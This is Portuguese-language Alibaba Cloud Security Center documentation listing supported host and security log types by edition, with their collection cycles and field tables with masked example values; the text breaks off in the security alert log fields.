A análise de logs do Security Center centraliza dados de atividades do host e eventos de segurança para auditoria, rastreamento de incidentes e detecção de ameaças. Este tópico abrange os tipos de log compatíveis, a disponibilidade por edição, os campos de log e os ciclos de coleta.
Compatibilidade por versão
Os tipos de log disponíveis dependem da sua edição do Security Center ou do nível de proteção contratado.
Subscription
Logs de host
|
Tipo de log |
Basic |
Anti-virus |
Advanced Edition |
Enterprise |
Ultimate |
|
Logs de fluxo de logon |
|
|
|
|
|
|
Logs de conexão de rede |
|
|
|
|
|
|
Logs de inicialização de processo |
|
|
|
|
|
|
Logs de ataque de força bruta |
|
|
|
|
|
|
Logs de solicitação DNS |
|
|
|
|
|
|
Logs de eventos do cliente |
|
|
|
|
|
|
Logs de snapshot de conta |
|
|
|
|
|
|
Logs de snapshot de rede |
|
|
|
|
|
|
Logs de snapshot de processo |
|
|
|
|
|
|
Logs de módulo binário |
|
|
|
|
|
|
Logs de escrita de arquivo por processo |
|
|
|
|
|
|
Logs de operação de registro |
|
|
|
|
|
Logs de segurança
Tipo de log | Basic | Anti-virus | Advanced Edition | Enterprise | Ultimate |
Logs de alerta de segurança | Nota Registra apenas alertas compatíveis com a edição Basic. | ||||
Logs de vulnerabilidade | Nota Registra apenas vulnerabilidades compatíveis com a edição Basic. | ||||
Logs de defesa de rede | |||||
Logs de eventos de monitoramento de arquivos críticos | |||||
CSPM - Logs de verificação de linha de base | |||||
CSPM - Logs de verificação de configuração de plataforma em nuvem | |||||
Logs de proteção de aplicação | |||||
Logs de detecção de arquivos maliciosos | |||||
Logs de detecção sem agente |
Logs de services de valor agregado
Se você ativar qualquer um dos seguintes services de valor agregado, o Security Center analisará os logs gerados:
Malicious File Detection
Agentless Detection
RASP
CSPM(Baseline Check e Cloud Service Configuration Risk)
Pay-as-you-go
Ao adquirir o service Host and Container Security no modelo pay-as-you-go, os tipos de log disponíveis variam conforme o nível de proteção atribuído a cada servidor.
Logs de host
|
Tipo de log |
Unprotected |
Antivirus |
Comprehensive Host Protection |
Hosts and Container Protection |
|
Logs de fluxo de logon |
|
|
|
|
|
Logs de conexão de rede |
|
|
|
|
|
Logs de inicialização de processo |
|
|
|
|
|
Logs de ataque de força bruta |
|
|
|
|
|
Logs de solicitação DNS |
|
|
|
|
|
Logs de eventos do cliente |
|
|
|
|
|
Logs de snapshot de conta |
|
|
|
|
|
Logs de snapshot de rede |
|
|
|
|
|
Logs de snapshot de processo |
|
|
|
|
Logs de segurança
Tipo de log | Unprotected | Antivirus | Comprehensive Host Protection | Hosts and Container Protection |
Logs de alerta de segurança | Nota Registra apenas alertas compatíveis com o nível Unprotected. | |||
Logs de vulnerabilidade | Nota Registra apenas vulnerabilidades compatíveis com o nível Unprotected. | |||
Logs de defesa de rede | ||||
Logs de eventos de monitoramento de arquivos críticos |
Logs de services pay-as-you-go
Ao ative qualquer um dos seguintes services pay-as-you-go, o Security Center analisa os logs gerados:
Malicious File Detection
Agentless Detection
RASP
CSPM(Baseline Check,CSPM)
Visão geral dos tipos de log
As amostras de log e as descrições de campos servem apenas como referência. Os campos podem mudar com atualizações do product. Os dados reais no SLS refletem o esquema mais atual.
A lista de campos dos logs do Security Center não inclui o campo project_id. Os logs são armazenados em um projeto do Simple Log Service (SLS). Os projetos do SLS seguem o formato de nomenclatura aliyun-cloudsiem-data-{UID}-{RegionID}, onde {UID} é o UID da sua conta Alibaba Cloud e {RegionID} é o ID da região. Um projeto SLS é um conceito de hierarquia de armazenamento, não um campo de log. Para filtrar logs por propriedade, utilize o nível de projeto SLS em vez do nível de campo de log.
Logs de host
Logs de fluxo de logon
__topic__: aegis-log-loginConteúdo do log: Registra eventos de logon no servidor, incluindo IP de source, nome de usuário e resultado.
-
Descrição do recurso: Monitora a atividade do usuário e detecta comportamentos anômalos.
ImportanteO Security Center não coleta logs de fluxo de logon para servidores executando Windows Server 2008.
Ciclo de coleta: Tempo real.
Logs de conexão de rede
__topic__: aegis-log-networkConteúdo do log: Registra conexões de rede em tempo real nos servidores, incluindo tuplas-5 e processos associados.
-
Descrição do recurso: Identifica padrões de conexão anômalos, detecta ataques de rede e otimiza o desempenho.
NotaO agente coleta apenas um subconjunto de estados de conexão entre o estabelecimento e o encerramento. O tráfego de entrada não é registrado.
Ciclo de coleta: Tempo real.
Logs de inicialização de processo
__topic__: aegis-log-processConteúdo do log: Registra eventos de inicialização para todos os novos processos, incluindo nome do processo, argumentos de linha de comando e processo pai.
Descrição do recurso: Rastreia inicializações de processos, detecta comportamentos anormais e identifica intrusões de malware.
Ciclo de coleta: Tempo real. Os logs são reportados imediatamente após a inicialização do processo.
Logs de módulo binário
__topic__: aegis-log-bin-moduleConteúdo do log: Registra informações sobre módulos binários carregados por processos, incluindo caminhos de arquivo do módulo, valores de hash, tamanhos e horários de criação.
Descrição do recurso: Permite entender as dependências de módulos em tempo de execução e detectar carregamento anômalo de módulos ou injeção maliciosa de DLL.
Ciclo de coleta: Tempo real.
Logs de escrita de arquivo por processo
__topic__: aegis-log-file-eventConteúdo do log: Registra eventos de escrita de arquivo por processos, incluindo caminhos de arquivo, informações do processo e informações do contêiner.
Descrição do recurso: Rastreia o comportamento de escrita em arquivos e detecta operações anômalas, criação de arquivos maliciosos e riscos de exfiltração de dados.
Ciclo de coleta: Tempo real.
Logs de operação de registro
__topic__: aegis-log-regeditConteúdo do log: Registra eventos de operação no registro, incluindo o caminho da chave de registro, valor, tipo de dados e o processo que realizou a operação.
Descrição do recurso: Monitora alterações no registro e detecta malwares modificando configurações do sistema ou estabelecendo persistência.
Ciclo de coleta: Tempo real.
Logs de ataque de força bruta
__topic__: aegis-log-crackConteúdo do log: Registra tentativas de ataque de força bruta contra sistemas, aplicações e contas.
Descrição do recurso: Identifica ataques de força bruta, detecta logons anormais, senhas fracas e vazamentos de credenciais, além de apoiar a resposta a incidentes e análises forenses.
Ciclo de coleta: Tempo real.
Logs de snapshot de conta
__topic__: aegis-snapshot-hostConteúdo do log: Registra detalhes de contas de usuário, incluindo nome de usuário, política de senha e histórico de logon.
-
Descrição do recurso:
ImportanteCompare snapshots ao longo do tempo para monitorar alterações de conta e detectar acessos não autorizados e anomalias no status da conta.
Ciclo de coleta: Automático, com base no intervalo de fingerprint de ativos (padrão: uma vez por dia). A coleta manual também é compatível.
Logs de snapshot de rede
__topic__: aegis-snapshot-portConteúdo do log: Registra conexões de rede, incluindo tuplas-5, status e processos associados.
Descrição do recurso: Identifica conexões ativas, padrões anômalos e possíveis ataques de rede.
Ciclo de coleta: Automático, com base no intervalo de fingerprint de ativos (padrão: uma vez por dia). A coleta manual também é compatível.
Logs de snapshot de processo
__topic__: aegis-snapshot-processConteúdo do log: Registra a atividade de processos, incluindo IDs de processo, nomes e horários de inicialização.
Descrição do recurso: Monitora a atividade de processos e o consumo de recursos; detecta processos anormais, uso excessivo de CPU e vazamentos de memória.
Ciclo de coleta: Automático, com base no intervalo de fingerprint de ativos (padrão: uma vez por dia). A coleta manual também é compatível.
Logs de solicitação DNS
__topic__: aegis-log-dns-queryConteúdo do log: Registra consultas DNS iniciadas pelo servidor, incluindo nomes de domínio, tipos de consulta e origens.
-
Descrição do recurso: Analisa a atividade DNS e detecta consultas anômalas, sequestro de domínio ou envenenamento.
ImportanteA coleta de logs não é compatível com servidores Linux com versão de kernel anterior a 4.x.x.
Ciclo de coleta: Tempo real.
Logs de eventos do cliente
__topic__: aegis-log-clientConteúdo do log: Registra eventos de online/offline do cliente do Security Center.
Descrição do recurso: Monitora a disponibilidade do cliente.
Ciclo de coleta: Tempo real.
Logs de segurança
Todos os logs de segurança são coletados em tempo real.
Logs de vulnerabilidade
__topic__: sas-vul-logConteúdo do log: Registra vulnerabilidades descobertas, incluindo nomes, status e ações de tratamento.
Descrição do recurso: Rastreia vulnerabilidades, avalia riscos de segurança e prioriza a correção.
CSPM - Logs de verificação de linha de base
__topic__: sas-hc-logConteúdo do log: Registra resultados de verificações de linha de base, incluindo níveis, categorias e níveis de risco.
-
Descrição do recurso: Avalia a postura de segurança da linha de base e identifica riscos de configuração.
NotaApenas itens de verificação que falham pela primeira vez são registrados, juntamente com itens que passaram anteriormente, mas falharam na reinspeção.
Logs de alerta de segurança
__topic__: sas-security-logConteúdo do log: Registra alertas de segurança, incluindo fontes de dados, detalhes e níveis de gravidade.
Descrição do recurso: Permite compreender ameaças de segurança e responder prontamente.
CSPM - Logs de verificação de configuração de plataforma em cloud
__topic__: sas-cspm-logConteúdo do log: Registra resultados de verificações de configuração da plataforma em cloud e operações de lista de permissões.
Descrição do recurso: Identifica problemas de configuração e riscos de segurança na plataforma em cloud.
Logs de defesa de rede
__topic__: sas-net-blockConteúdo do log: Registra eventos de ataque de rede, incluindo tipos de ataque e endereços IP de source e destino.
Descrição do recurso: Detecta ataques de rede, responde a ameaças e melhora a segurança da rede.
Logs de proteção de aplicação
__topic__: sas-rasp-logConteúdo do log: Registra alertas de ataque RASP, incluindo tipos de ataque, dados comportamentais e IPs de atacantes.
Descrição do recurso: Detecta ataques na camada de aplicação e melhora a segurança em tempo de execução.
Logs de detecção de arquivos maliciosos
__topic__: sas-filedetect-logConteúdo do log: Registra resultados de detecção de arquivos maliciosos, incluindo informações do arquivo, cenários de detecção e resultados.
Descrição do recurso: Identifica programas maliciosos em arquivos offline ou armazenamento em cloud para tratamento oportuno.
Logs de eventos de monitoramento de arquivos críticos
__topic__: aegis-file-protect-logConteúdo do log: Registra alertas de monitoramento de arquivos críticos, incluindo caminhos de arquivo, tipos de operação e níveis de alerta.
Descrição do recurso: Detecta roubo ou adulteração de arquivos críticos.
Logs de detecção sem agente
__topic__: sas-agentless-logConteúdo do log: Registra riscos de segurança em servidores em cloud, snapshots de disco e imagens, incluindo vulnerabilidades, verificações de linha de base, amostras maliciosas e arquivos sensíveis.
Descrição do recurso: Visualize riscos de segurança de ativos em diferentes períodos e identifica ameaças potenciais.
Campos de logs de host
Logs de fluxo de logon
Campo | Descrição | Exemplo |
instance_id | O ID da instância. | i-2zeg4zldn8zypsfg**** |
host_ip | O endereço IP do servidor. | 192.168.XX.XX |
sas_group_name | O grupo de ativos do servidor no Security Center. | default |
uuid | O UUID do servidor. | 5d83b26b-b7ca-4a0a-9267-12**** |
src_ip | O endereço IP de source usado para fazer logon no servidor. | 221,11.XX.XX |
dst_port | A porta usada para o logon. | 22 |
login_type | O tipo de logon. Os valores incluem, mas não se limitam a: | ssh |
username | O nome de usuário usado para o logon. | admin |
login_count | O número de logons. Logons repetidos dentro de 1 minuto são mesclados em uma única entrada. Por exemplo, um | 3 |
start_time | O timestamp de início, em segundos. Também usado para indicar o momento em que o evento ocorreu. | 1719472214 |
auth_type | Tipo de autenticação, tipo string.
| 1 |
success | Indica se o logon foi bem-sucedido. Valores: | 1 |
pid | O PID do processo de autenticação. | 12345 |
src_port | O número da porta de source do logon, tipo string. | 43006 |
ssh_fingerprint | A impressão digital da chave ssh usada para logon, tipo string. Quando a autenticação por chave é utilizada, este campo registra a impressão digital correspondente. Quando a autenticação por senha é utilizada, este campo fica vazio. | SHA256:xxxxxxxxxxxx |
Logs de conexão de rede
|
Campo |
Descrição |
Exemplo |
|
cmd_chain |
A cadeia de processos. |
[ {"9883":"bash -c kill -0 -- -'6274'"} ... ] |
|
cmd_chain_index |
O índice da cadeia de processos. Use este índice para consultar a cadeia de processos correspondente. |
B184 |
|
container_hostname |
O nome do host dentro do contêiner. |
nginx-ingress-controller-765f67fd4d-**** |
|
container_id |
O ID do contêiner. |
4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d**** |
|
container_image_id |
O ID da imagem do contêiner. |
registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0**** |
|
container_image_name |
O nome da imagem do contêiner. |
registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-**** |
|
container_name |
O nome do contêiner. |
nginx-ingress-**** |
|
container_pid |
O ID do processo dentro do contêiner. |
0 |
|
net_connect_dir |
A direção da conexão de rede. Valores: |
in |
|
dst_ip |
O endereço IP do receptor da conexão. Se |
192.168.XX.XX |
|
dst_port |
A porta do receptor da conexão. |
443 |
|
instance_id |
O ID da instância. |
i-2zeg4zldn8zypsfg**** |
|
host_ip |
O endereço IP do servidor. |
192.168.XX.XX |
|
parent_proc_name |
O nome do arquivo do processo pai. |
/usr/bin/bash |
|
pid |
O ID do processo. |
14275 |
|
ppid |
O ID do processo pai. |
14268 |
|
proc_name |
O nome do processo. |
nginx |
|
proc_path |
O caminho do processo. |
/usr/local/nginx/sbin/nginx |
|
proc_start_time |
O horário de inicialização do processo. |
N/A |
|
connection_type |
O protocolo. Valores: |
tcp |
|
sas_group_name |
O grupo de ativos do servidor no Security Center. |
default |
|
src_ip |
O endereço IP de source. |
100.127.XX.XX |
|
src_port |
A porta de source. |
41897 |
|
srv_comm |
O nome do comando associado ao processo avô. |
containerd-shim |
|
status |
O status da conexão de rede. Valores: 1 (Fechado); 2 (Ouvindo); 3 (SYN enviado); 4 (SYN recebido); 5 (Estabelecido); 6 (Close wait); 7 (Fechando); 8 (FIN wait 1); 9 (FIN wait 2); 10 (Time wait); 11 (TCB excluído). |
5 |
|
type |
O tipo de conexão de rede em tempo real. Valores: |
listen |
|
uid |
O ID do usuário do processo. |
101 |
|
username |
O nome de usuário do processo. |
root |
|
uuid |
O UUID do servidor. |
5d83b26b-b7ca-4a0a-9267-12**** |
|
start_time |
O timestamp de início, em segundos. Também usado para indicar o momento em que o evento ocorreu. |
1719472214 |
Logs de inicialização de processo
|
Campo |
Descrição |
Exemplo |
|
cmd_chain |
A cadeia de processos. |
[ {"9883":"bash -c kill -0 -- -'6274'"} ... ] |
|
cmd_chain_index |
O índice da cadeia de processos. Use este índice para consultar a cadeia de processos correspondente. |
B184 |
|
cmd_index |
O índice de cada parâmetro na linha de comando. Cada par de valores marca a posição inicial e final de um parâmetro. |
0,3,5,8 |
|
cmdline |
A linha de comando completa usada para iniciar o processo. |
ipset list KUBE-6-CLUSTER-IP |
|
comm |
O nome do comando associado ao processo. |
N/A |
|
container_hostname |
O nome do host dentro do contêiner. |
nginx-ingress-controller-765f67fd4d-**** |
|
container_id |
O ID do contêiner. |
4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d**** |
|
container_image_id |
O ID da imagem do contêiner. |
registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0**** |
|
container_image_name |
O nome da imagem do contêiner. |
registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-**** |
|
container_name |
O nome do contêiner. |
nginx-ingress-**** |
|
container_pid |
O ID do processo dentro do contêiner. |
0 |
|
cwd |
O diretório de trabalho do processo. |
N/A |
|
proc_name |
O nome do arquivo do processo. |
ipset |
|
proc_path |
O caminho completo do arquivo de processo. |
/usr/sbin/ipset |
|
gid |
O ID do grupo de processos. |
0 |
|
groupname |
O nome do grupo de usuários. |
group1 |
|
instance_id |
O ID da instância. |
i-2zeg4zldn8zypsfg**** |
|
host_ip |
O endereço IP do servidor. |
192.168.XX.XX |
|
parent_cmd_line |
A linha de comando do processo pai. |
/usr/local/bin/kube-proxy --config=/var/lib/kube-proxy/config.conf --hostname-override=cn-beijing.192.168.XX.XX |
|
parent_proc_name |
O nome do arquivo do processo pai. |
kube-proxy |
|
parent_proc_path |
O caminho completo do arquivo do processo pai. |
/usr/local/bin/kube-proxy |
|
pid |
O ID do processo. |
14275 |
|
ppid |
O ID do processo pai. |
14268 |
|
proc_start_time |
O horário de inicialização do processo. |
2024-08-01 16:45:40 |
|
parent_proc_start_time |
O horário de inicialização do processo pai. |
2024-07-12 19:45:19 |
|
sas_group_name |
O grupo de ativos do servidor no Security Center. |
default |
|
srv_cmd |
A linha de comando do processo avô. |
/usr/bin/containerd |
|
tty |
O terminal de logon. N/A indica que a conta nunca fez logon em um terminal. |
N/A |
|
uid |
O ID do usuário. |
123 |
|
username |
O nome de usuário do processo. |
root |
|
uuid |
O UUID do servidor. |
5d83b26b-b7ca-4a0a-9267-12**** |
|
start_time |
O timestamp de início, em segundos. Também usado para indicar o momento em que o evento ocorreu. |
1719472214 |
Logs de ataque de força bruta
|
Campo |
Descrição |
Exemplo |
|
instance_id |
O ID da instância. |
i-2zeg4zldn8zypsfg**** |
|
host_ip |
O endereço IP do servidor sob ataque de força bruta. |
192.168.XX.XX |
|
sas_group_name |
O grupo de ativos do servidor no Security Center. |
default |
|
uuid |
O UUID do servidor sob ataque de força bruta. |
5d83b26b-b7ca-4a0a-9267-12* |
|
login_count |
O número de tentativas de logon falhas. Tentativas repetidas dentro de 1 minuto são mescladas em uma única entrada. Por exemplo, um |
3 |
|
src_ip |
O endereço IP de source da tentativa de logon. |
47.92.XX.XX |
|
dst_port |
A porta de logon. |
22 |
|
login_type |
O tipo de logon. Valores: |
ssh |
|
username |
O nome de usuário do logon. |
user |
|
start_time |
O timestamp de início, em segundos. Também usado para indicar o momento em que o evento ocorreu. |
1719472214 |
Logs de snapshot de conta
|
Campo |
Descrição |
Exemplo |
|
account_expire |
A data de expiração da conta. O valor |
never |
|
domain |
O domínio ou service de diretório ao qual a conta pertence. N/A significa que a conta não pertence a nenhum domínio. |
N/A |
|
groups |
Os grupos aos quais a conta pertence. N/A significa que a conta não pertence a nenhum grupo. |
["nscd"] |
|
home_dir |
O diretório home, local padrão para armazenar e gerenciar arquivos no sistema. |
/Users/abc |
|
instance_id |
O ID da instância. |
i-2zeg4zldn8zypsfg**** |
|
host_ip |
O endereço IP do servidor. |
192.168.XX.XX |
|
last_chg |
A data da última alteração da senha. |
2022-11-29 |
|
last_logon |
A data e hora do último logon. N/A significa que a conta nunca foi usada para fazer logon. |
2023-08-18 09:21:21 |
|
login_ip |
O endereço IP remoto do último logon. N/A significa que a conta nunca foi usada para fazer logon. |
192.168.XX.XX |
|
passwd_expire |
A data de expiração da senha. O valor |
2024-08-24 |
|
perm |
Se a conta tem permissões de root. Valores: |
0 |
|
sas_group_name |
O grupo de ativos do servidor no Security Center. |
default |
|
shell |
O shell Linux. |
/sbin/nologin |
|
status |
O status da conta de usuário. Valores: |
0 |
|
tty |
O terminal de logon. N/A significa que a conta nunca fez logon em um terminal. |
N/A |
|
username |
O nome de usuário. |
nscd |
|
uuid |
O UUID do servidor. |
5d83b26b-b7ca-4a0a-9267-12**** |
|
warn_time |
A data de lembrete de expiração da senha. O valor |
2024-08-20 |
|
start_time |
O timestamp de início, em segundos. Também usado para indicar o momento em que o evento ocorreu. |
1719472214 |
Logs de snapshot de rede
|
Campo |
Descrição |
Exemplo |
|
net_connect_dir |
A direção da conexão de rede. Valores: |
in |
|
dst_ip |
O endereço IP par, geralmente vazio. Observação: Como apenas logs com status 2 são entregues, |
|
|
dst_port |
A porta do receptor da conexão. |
443 |
|
instance_id |
O ID da instância. |
i-2zeg4zldn8zypsfg**** |
|
host_ip |
O endereço IP do servidor. |
192.168.XX.XX |
|
pid |
O ID do processo. |
682 |
|
proc_name |
O nome do processo. |
sshd |
|
connection_type |
O protocolo. Valores: |
tcp4 |
|
sas_group_name |
O grupo de ativos do servidor no Security Center. |
default |
|
src_ip |
O endereço IP local. |
100.127.XX.XX |
|
src_port |
A porta de escuta. |
41897 |
|
status |
O valor é 2, indicando que a porta está ouvindo; o |
5 |
|
uuid |
O UUID do servidor. |
5d83b26b-b7ca-4a0a-9267-12**** |
|
start_time |
O timestamp de início, em segundos. Também usado para indicar o momento em que o evento ocorreu. |
1719472214 |
Logs de snapshot de processo
|
Campo |
Descrição |
Exemplo |
|
cmdline |
A linha de comando completa usada para iniciar o processo. |
/usr/local/share/assist-daemon/assist_daemon |
|
instance_id |
O ID da instância. |
i-2zeg4zldn8zypsfg**** |
|
host_ip |
O endereço IP do servidor. |
192.168.XX.XX |
|
md5 |
O hash MD5 do arquivo binário. Arquivos maiores que 1 MB não são calculados. |
1086e731640751c9802c19a7f53a64f5 |
|
proc_name |
O nome do arquivo do processo. |
assist_daemon |
|
proc_path |
O caminho completo do arquivo de processo. |
/usr/local/share/assist-daemon/assist_daemon |
|
pid |
O ID do processo. |
1692 |
|
pname |
O nome do arquivo do processo pai. |
systemd |
|
sas_group_name |
O grupo de ativos do servidor no Security Center. |
default |
|
proc_start_time |
O horário de inicialização do processo. Campo interno. |
2023-08-18 20:00:12 |
|
uid |
O ID do usuário do processo. |
101 |
|
username |
O nome de usuário do processo. |
root |
|
uuid |
O UUID do servidor. |
5d83b26b-b7ca-4a0a-9267-12**** |
|
start_time |
O timestamp de início, em segundos. Também usado para indicar o momento em que o evento ocorreu. |
1719472214 |
Logs de solicitação DNS
|
Campo |
Descrição |
Exemplo |
|
domain |
O nome de domínio correspondente à solicitação DNS. |
example.aliyundoc.com |
|
instance_id |
O ID da instância. |
i-2zeg4zldn8zypsfg**** |
|
host_ip |
O endereço IP do servidor que iniciou a solicitação DNS. |
192.168.XX.XX |
|
pid |
O ID do processo que iniciou a solicitação DNS. |
3544 |
|
ppid |
O ID do processo pai que iniciou a solicitação DNS. |
3408 |
|
cmd_chain |
A cadeia de processos que iniciou a solicitação DNS. |
"3544":"\"C:\\Program Files (x86)\\Alibaba\\Aegis\\AliDetect\\AliDetect.exe\"" |
|
cmdline |
A linha de comando que iniciou a solicitação DNS. |
C:\Program Files (x86)\Alibaba\Aegis\AliDetect\AliDetect.exe |
|
proc_path |
O caminho do processo que iniciou a solicitação DNS. |
C:/Program Files (x86)/Alibaba/Aegis/AliDetect/AliDetect.exe |
|
sas_group_name |
O grupo de ativos do servidor no Security Center. |
default |
|
time |
O horário em que o evento de solicitação DNS foi capturado. Este horário geralmente corresponde à ocorrência real da solicitação DNS. |
2023-08-17 20:05:04 |
|
uuid |
O UUID do servidor que iniciou a solicitação DNS. |
5d83b26b-b7ca-4a0a-9267-12**** |
|
start_time |
O timestamp de início, em segundos. Também usado para indicar o momento em que o evento ocorreu. |
1719472214 |
Logs de eventos do cliente
|
Campo |
Descrição |
Exemplo |
|
uuid |
O UUID do servidor. |
5d83b26b-b7ca-4a0a-9267-12**** |
|
host_ip |
O endereço IP do servidor. |
192.168.XX.XX |
|
agent_version |
A versão do cliente. |
aegis_11_91 |
|
last_login |
O timestamp do logon anterior, em milissegundos. |
1716444387617 |
|
platform |
O tipo de sistema operacional. Valores: |
linux |
|
region_id |
O ID da região onde o servidor reside. |
cn-beijing |
|
status |
O status do cliente. Valores: |
online |
|
start_time |
O timestamp de início, em segundos. Também usado para indicar o momento em que o evento ocorreu. |
1719472214 |
Logs de módulo binário
|
Campo |
Descrição |
Exemplo |
|
user_id |
O ID do usuário. |
123 |
|
host_ip |
O endereço IP da máquina cliente. |
1.2.3.4 |
|
uuid |
O UUID do servidor. |
inet-eb7c23e9-1352-4f03-a1b3-73800d3524da |
|
proc_list |
A lista de processos que carregaram o módulo, no formato json. |
[{"path":"C:/Windows/System32/svchost.exe","cmdline":"...","pid":84,"md5":"..."}] |
|
file_path |
O caminho do arquivo do módulo. |
c:\\windows\\system32\\msvcrt.dll |
|
md5 |
O hash MD5 do módulo. |
d80c5d199b7700b89dbdc52ab58c7519 |
|
sha256 |
O hash SHA256 do módulo. Uma string vazia indica que não foi calculado. |
|
|
file_size |
O tamanho do módulo, em bytes. |
800008 |
|
bin_create |
O horário de criação do módulo. |
2017-06-08 11:49:55 |
|
bin_modified |
O horário da última modificação do módulo. |
2014-10-29 11:06:28 |
|
source |
O identificador do tipo de source. |
5 |
|
start_time |
O timestamp de gravação do log, em segundos (timestamp Unix). |
1719472214 |
Logs de escrita de arquivo por processo
|
Campo |
Descrição |
Exemplo |
|
user_id |
O ID do usuário. |
123 |
|
host_ip |
O endereço IP da máquina cliente. |
1.2.3.4 |
|
uuid |
O UUID do servidor. |
inet-eb7c23e9-1352-4f03-a1b3-73800d3524da |
|
proc_path |
O caminho do processo que operou o arquivo. |
/home/shared/app_bin/maple_ffmpeg |
|
cmdline |
A linha de comando completa do processo. |
/home/shared/app_bin/maple_ffmpeg -y -threads 4 -i ... |
|
event_type |
O tipo de evento de operação de arquivo, como open ou write. |
open |
|
file_path |
O caminho do arquivo operado. |
/home/shared/app-video-trans/dbe36b1f-.../... |
|
parent_proc_path |
O caminho do arquivo executável do processo pai. |
/usr/java/jdk1.8.0_171/bin/java |
|
pid |
O ID do processo. |
882378 |
|
ppid |
O ID do processo pai. |
1019718 |
|
pstime |
O horário de inicialização do processo pai. |
2025-10-30 12:02:38 |
|
proc_start_time |
O horário de inicialização do processo. |
2025-10-30 12:02:38 |
|
cmd_chain |
A cadeia de invocação de processos, no formato json. |
[{"882378":"/home/shared/app_bin/maple_ffmpeg..."}] |
|
cmd_chain_index |
O identificador de índice da cadeia de comandos. |
P47948934 |
|
srv_cmd |
A linha de comando do service associado. |
/usr/bin/python /usr/bin/supervisord -c /etc/supervisord.conf |
|
srv_comm |
O nome do service associado. |
supervisord |
|
flag |
O valor do sinalizador de operação de arquivo. |
33345 |
|
old_file_path |
O caminho original do arquivo antes de renomear ou mover. |
|
|
username |
O nome de usuário que realizou a operação. |
|
|
container_id |
O ID do contêiner. |
|
|
container_name |
O nome do contêiner. |
|
|
container_hostname |
O nome do host dentro do contêiner. |
|
|
container_image_id |
O ID da imagem do contêiner. |
|
|
container_image_name |
O nome da imagem do contêiner. |
|
|
start_time |
O timestamp de gravação do log, em segundos (timestamp Unix). |
1719472214 |
Logs de operação de registro
|
Campo |
Descrição |
Exemplo |
|
user_id |
O ID do usuário. |
123 |
|
host_ip |
O endereço IP da máquina cliente. |
1.2.3.4 |
|
uuid |
O UUID do servidor. |
inet-eb7c23e9-1352-4f03-a1b3-73800d3524da |
|
registry_key |
O caminho da chave de registro que foi operada. |
\\REGISTRY\\MACHINE\\SOFTWARE\\WOW6432Node\\... |
|
registry_value |
O valor da chave de registro. |
N/A |
|
registry_type |
O tipo de dados da chave de registro. |
N/A |
|
key_account |
A conta que realizou a operação de registro. |
N/A |
|
proc_path |
O caminho do processo que realizou a operação de registro. |
C:/Program Files (x86)/ManageEngine/UEMS_Agent/bin/DCProcessMonitor.exe |
|
cmdline |
A linha de comando do processo. |
DCProcessMonitor.exe |
|
pid |
O ID do processo. |
11060 |
|
ppid |
O ID do processo pai do processo. |
2272 |
|
time |
O horário em que a operação de registro ocorreu. |
2025-11-12 10:32:42 |
|
start_time |
O timestamp de gravação do log, em segundos (timestamp Unix). |
1719472214 |
Campos de logs de segurança
Logs de vulnerabilidade
|
Campo |
Descrição |
Exemplo |
|
vul_alias_name |
O alias da vulnerabilidade. |
CESA-2023:1335: openssl Security Update |
|
risk_level |
O nível de risco. Valores: |
later |
|
extend_content |
Informações estendidas da vulnerabilidade no formato json. |
{"cveList":["CVE-2023-0286"],"necessity":{...},"os":"centos",...} |
|
instance_id |
O ID da instância. |
i-2zeg4zldn8zypsfg**** |
|
internet_ip |
O endereço IP público do ativo. |
39.104.XX.XX |
|
intranet_ip |
O endereço IP privado do ativo. |
192.168.XX.XX |
|
instance_name |
O nome do host. |
hhht-linux-*** |
|
vul_name |
O nome da vulnerabilidade. |
centos:7:cesa-2023:1335 |
|
operation |
A ação realizada na vulnerabilidade. Valores: |
new |
|
status |
O status da vulnerabilidade. Valores: 1 (Não corrigida); 2 (Falha na correção); 3 (Falha na reversão); 4 (Corrigindo); 5 (Revertendo); 6 (Verificando); 7 (Corrigida); 8 (Corrigida, reinicialização necessária); 9 (Revertida); 10 (Ignorada); 11 (Revertida, reinicialização necessária); 12 (Não existe); 13 (Inválida). |
1 |
|
tag |
A tag da vulnerabilidade. Valores: |
oval |
|
type |
O tipo de vulnerabilidade. Valores: |
sys |
|
uuid |
O UUID do servidor. |
ad66133a-dc82-4e5e-9659-a49e3**** |
|
start_time |
O timestamp de início, em segundos. Também usado para indicar o momento em que o evento ocorreu. |
1719472214 |
CSPM - Logs de verificação de linha de base
|
Campo |
Descrição |
Exemplo |
|
check_item_name |
O nome do item de verificação. |
Defina intervalo mínimo para alterações de senha |
|
check_item_level |
O nível de gravidade da verificação de linha de base. Valores: |
medium |
|
check_type |
O tipo do item de verificação. |
Autenticação de identidade |
|
instance_id |
O ID da instância. |
i-2zeg4zldn8zypsfg**** |
|
risk_level |
O nível de risco. Valores: |
medium |
|
operation |
A operação. Valores: |
new |
|
risk_name |
O nome do item de risco. |
Verificação de conformidade da política de senha |
|
sas_group_name |
O grupo de ativos do servidor no Security Center onde o item de risco foi detectado. |
default |
|
status |
As informações de status. Dois conjuntos de códigos de status se aplicam: Status de verificação de linha de base: 1 (Falhou); 2 (Verificando); 6 (Ignorado); 7 (Corrigindo). Status de tratamento: 1 (Não corrigido); 2 (Falha na correção); 3 (Falha na reversão); 4 (Corrigindo); 5 (Revertendo); 6 (Verificando); 7 (Corrigido); 8 (Corrigido, reinicialização necessária); 9 (Revertido); 10 (Ignorado); 11 (Revertido, reinicialização necessária); 12 (Não existe); 13 (Inválido). |
1 |
|
sub_type_alias_name |
O alias do subtipo. |
Melhores práticas internacionais de segurança - Verificação de linha de base de segurança Ubuntu 16/18/20/22 |
|
sub_type_name |
O nome do subtipo de linha de base. Para valores válidos, consulte List of baseline types and subtypes. |
hc_ubuntu16_cis_rules |
|
type_alias_name |
O alias do tipo. |
Melhores práticas internacionais de segurança |
|
type_name |
O tipo de linha de base. Para valores válidos, consulte List of baseline types and subtypes. |
cis |
|
uuid |
O UUID do servidor onde o item de risco foi detectado. |
1ad66133a-dc82-4e5e-9659-a49e3**** |
|
start_time |
O timestamp de início, em segundos. Também usado para indicar o momento em que o evento ocorreu. |
1719472214 |
Logs de alerta de segurança
|
Campo |
Descrição |
Exemplo |
|
data_source |
